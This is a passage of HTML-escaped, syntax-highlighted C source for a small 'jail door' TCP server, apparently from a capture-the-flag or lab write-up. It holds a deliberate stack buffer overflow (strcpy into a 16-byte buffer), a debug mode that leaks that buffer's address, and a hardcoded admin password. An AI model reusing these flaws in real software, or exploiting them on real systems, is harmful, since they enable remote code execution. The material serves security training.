&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">int auth&lt;span class="o">(&lt;/span>char *username, char *password&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> char userpass&lt;span class="o">[&lt;/span>16&lt;span class="o">]&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> char *response&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>&lt;span class="nv">debugmode&lt;/span> &lt;span class="o">==&lt;/span> 1&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> printf&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;Debug: userpass buffer @ %p\n&amp;#34;&lt;/span>, userpass&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> fflush&lt;span class="o">(&lt;/span>stdout&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>strcmp&lt;span class="o">(&lt;/span>username, &lt;span class="s2">&amp;#34;admin&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span> !&lt;span class="o">=&lt;/span> 0&lt;span class="o">)&lt;/span> &lt;span class="k">return&lt;/span> 0&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> strcpy&lt;span class="o">(&lt;/span>userpass, password&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>strcmp&lt;span class="o">(&lt;/span>userpass, &lt;span class="s2">&amp;#34;1974jailbreak!&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span> &lt;span class="o">==&lt;/span> 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">return&lt;/span> 1&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span> &lt;span class="k">else&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> printf&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;Incorrect username and/or password.\n&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">return&lt;/span> 0&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">return&lt;/span> 0&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">int handle&lt;span class="o">(&lt;/span>int sock&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> int n&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> int &lt;span class="nv">gotuser&lt;/span> &lt;span class="o">=&lt;/span> 0&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> int &lt;span class="nv">gotpass&lt;/span> &lt;span class="o">=&lt;/span> 0&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> char buffer&lt;span class="o">[&lt;/span>1024&lt;span class="o">]&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> char strchr&lt;span class="o">[&lt;/span>2&lt;span class="o">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;\n\x00&amp;#34;&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> char *token&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> char username&lt;span class="o">[&lt;/span>256&lt;span class="o">]&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> char password&lt;span class="o">[&lt;/span>256&lt;span class="o">]&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nv">debugmode&lt;/span> &lt;span class="o">=&lt;/span> 0&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> memset&lt;span class="o">(&lt;/span>buffer, 0, 256&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> dup2&lt;span class="o">(&lt;/span>sock, STDOUT_FILENO&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> dup2&lt;span class="o">(&lt;/span>sock, STDERR_FILENO&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> printf&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;OK Ready. Send USER command.\n&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> fflush&lt;span class="o">(&lt;/span>stdout&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">while&lt;/span>&lt;span class="o">(&lt;/span>1&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nv">n&lt;/span> &lt;span class="o">=&lt;/span> read&lt;span class="o">(&lt;/span>sock, buffer, 1024&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>n &amp;lt; 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> perror&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;ERROR reading from socket&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">return&lt;/span> 0&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nv">token&lt;/span> &lt;span class="o">=&lt;/span> strtok&lt;span class="o">(&lt;/span>buffer, strchr&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">while&lt;/span> &lt;span class="o">(&lt;/span>token !&lt;span class="o">=&lt;/span> NULL&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>&lt;span class="nv">gotuser&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="m">1&lt;/span> &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> &lt;span class="nv">gotpass&lt;/span> &lt;span class="o">==&lt;/span> 1&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> break&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>strncmp&lt;span class="o">(&lt;/span>token, &lt;span class="s2">&amp;#34;USER &amp;#34;&lt;/span>, 5&lt;span class="o">)&lt;/span> &lt;span class="o">==&lt;/span> 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> strncpy&lt;span class="o">(&lt;/span>username, token+5, sizeof&lt;span class="o">(&lt;/span>username&lt;span class="o">))&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nv">gotuser&lt;/span>&lt;span class="o">=&lt;/span>1&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>&lt;span class="nv">gotpass&lt;/span> &lt;span class="o">==&lt;/span> 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> printf&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;OK Send PASS command.\n&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> fflush&lt;span class="o">(&lt;/span>stdout&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span> &lt;span class="k">else&lt;/span> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>strncmp&lt;span class="o">(&lt;/span>token, &lt;span class="s2">&amp;#34;PASS &amp;#34;&lt;/span>, 5&lt;span class="o">)&lt;/span> &lt;span class="o">==&lt;/span> 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> strncpy&lt;span class="o">(&lt;/span>password, token+5, sizeof&lt;span class="o">(&lt;/span>password&lt;span class="o">))&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nv">gotpass&lt;/span>&lt;span class="o">=&lt;/span>1&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>&lt;span class="nv">gotuser&lt;/span> &lt;span class="o">==&lt;/span> 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> printf&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;OK Send USER command.\n&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> fflush&lt;span class="o">(&lt;/span>stdout&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span> &lt;span class="k">else&lt;/span> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>strncmp&lt;span class="o">(&lt;/span>token, &lt;span class="s2">&amp;#34;DEBUG&amp;#34;&lt;/span>, 5&lt;span class="o">)&lt;/span> &lt;span class="o">==&lt;/span> 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>&lt;span class="nv">debugmode&lt;/span> &lt;span class="o">==&lt;/span> 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nv">debugmode&lt;/span> &lt;span class="o">=&lt;/span> 1&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> printf&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;OK DEBUG mode on.\n&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> fflush&lt;span class="o">(&lt;/span>stdout&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span> &lt;span class="k">else&lt;/span> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>&lt;span class="nv">debugmode&lt;/span> &lt;span class="o">==&lt;/span> 1&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nv">debugmode&lt;/span> &lt;span class="o">=&lt;/span> 0&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> printf&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;OK DEBUG mode off.\n&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> fflush&lt;span class="o">(&lt;/span>stdout&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nv">token&lt;/span> &lt;span class="o">=&lt;/span> strtok&lt;span class="o">(&lt;/span>NULL, strchr&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>&lt;span class="nv">gotuser&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="m">1&lt;/span> &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> &lt;span class="nv">gotpass&lt;/span> &lt;span class="o">==&lt;/span> 1&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> break&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>auth&lt;span class="o">(&lt;/span>username, password&lt;span class="o">))&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> printf&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;OK Authentication success. Send command.\n&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> fflush&lt;span class="o">(&lt;/span>stdout&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nv">n&lt;/span> &lt;span class="o">=&lt;/span> read&lt;span class="o">(&lt;/span>sock, buffer, 1024&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>n &amp;lt; 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> perror&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;Socket read error&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">return&lt;/span> 0&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>strncmp&lt;span class="o">(&lt;/span>buffer, &lt;span class="s2">&amp;#34;OPEN&amp;#34;&lt;/span>, 4&lt;span class="o">)&lt;/span> &lt;span class="o">==&lt;/span> 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> printf&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;OK Jail doors opened.&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> fflush&lt;span class="o">(&lt;/span>stdout&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span> &lt;span class="k">else&lt;/span> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>strncmp&lt;span class="o">(&lt;/span>buffer, &lt;span class="s2">&amp;#34;CLOSE&amp;#34;&lt;/span>, 5&lt;span class="o">)&lt;/span> &lt;span class="o">==&lt;/span> 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> printf&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;OK Jail doors closed.&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> fflush&lt;span class="o">(&lt;/span>stdout&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span> &lt;span class="k">else&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> printf&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;ERR Invalid command.\n&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> fflush&lt;span class="o">(&lt;/span>stdout&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">return&lt;/span> 1&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span> &lt;span class="k">else&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> printf&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;ERR Authentication failed.\n&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> fflush&lt;span class="o">(&lt;/span>stdout&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">return&lt;/span> 0&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">return&lt;/span> 0&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">int main&lt;span class="o">(&lt;/span>int argc, char *argv&lt;span class="o">[])&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> int sockfd&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> int newsockfd&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> int port&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> int clientlen&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> char buffer&lt;span class="o">[&lt;/span>256&lt;span class="o">]&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> struct sockaddr_in server_addr&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> struct sockaddr_in client_addr&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> int n&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> int pid&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> int sockyes&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nv">sockyes&lt;/span> &lt;span class="o">=&lt;/span> 1&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nv">sockfd&lt;/span> &lt;span class="o">=&lt;/span> socket&lt;span class="o">(&lt;/span>AF_INET, SOCK_STREAM, 0&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>sockfd &amp;lt; 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> perror&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;Socket error&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> exit&lt;span class="o">(&lt;/span>1&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>setsockopt&lt;span class="o">(&lt;/span>sockfd, SOL_SOCKET, SO_REUSEADDR, &lt;span class="p">&amp;amp;&lt;/span>sockyes, sizeof&lt;span class="o">(&lt;/span>int&lt;span class="o">))&lt;/span> &lt;span class="o">==&lt;/span> -1&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> perror&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;Setsockopt error&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> exit&lt;span class="o">(&lt;/span>1&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> memset&lt;span class="o">((&lt;/span>char*&lt;span class="o">)&lt;/span>&lt;span class="p">&amp;amp;&lt;/span>server_addr, 0, sizeof&lt;span class="o">(&lt;/span>server_addr&lt;span class="o">))&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nv">port&lt;/span> &lt;span class="o">=&lt;/span> 7411&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> server_addr.sin_family &lt;span class="o">=&lt;/span> AF_INET&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> server_addr.sin_addr.s_addr &lt;span class="o">=&lt;/span> INADDR_ANY&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> server_addr.sin_port &lt;span class="o">=&lt;/span> htons&lt;span class="o">(&lt;/span>port&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>bind&lt;span class="o">(&lt;/span>sockfd, &lt;span class="o">(&lt;/span>struct sockaddr*&lt;span class="o">)&lt;/span>&lt;span class="p">&amp;amp;&lt;/span>server_addr, sizeof&lt;span class="o">(&lt;/span>server_addr&lt;span class="o">))&lt;/span> &amp;lt; 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> perror&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;Bind error&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> exit&lt;span class="o">(&lt;/span>1&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> listen&lt;span class="o">(&lt;/span>sockfd, 200&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nv">clientlen&lt;/span> &lt;span class="o">=&lt;/span> sizeof&lt;span class="o">(&lt;/span>client_addr&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">while&lt;/span> &lt;span class="o">(&lt;/span>1&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nv">newsockfd&lt;/span> &lt;span class="o">=&lt;/span> accept&lt;span class="o">(&lt;/span>sockfd, &lt;span class="o">(&lt;/span>struct sockaddr*&lt;span class="o">)&lt;/span>&lt;span class="p">&amp;amp;&lt;/span>client_addr, &lt;span class="p">&amp;amp;&lt;/span>clientlen&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>newsockfd &amp;lt; 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> perror&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;Accept error&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> exit&lt;span class="o">(&lt;/span>1&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nv">pid&lt;/span> &lt;span class="o">=&lt;/span> fork&lt;span class="o">()&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>pid &amp;lt; 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> perror&lt;span class="o">(&lt;/span>&lt;span class="s2">&amp;#34;Fork error&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> exit&lt;span class="o">(&lt;/span>1&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
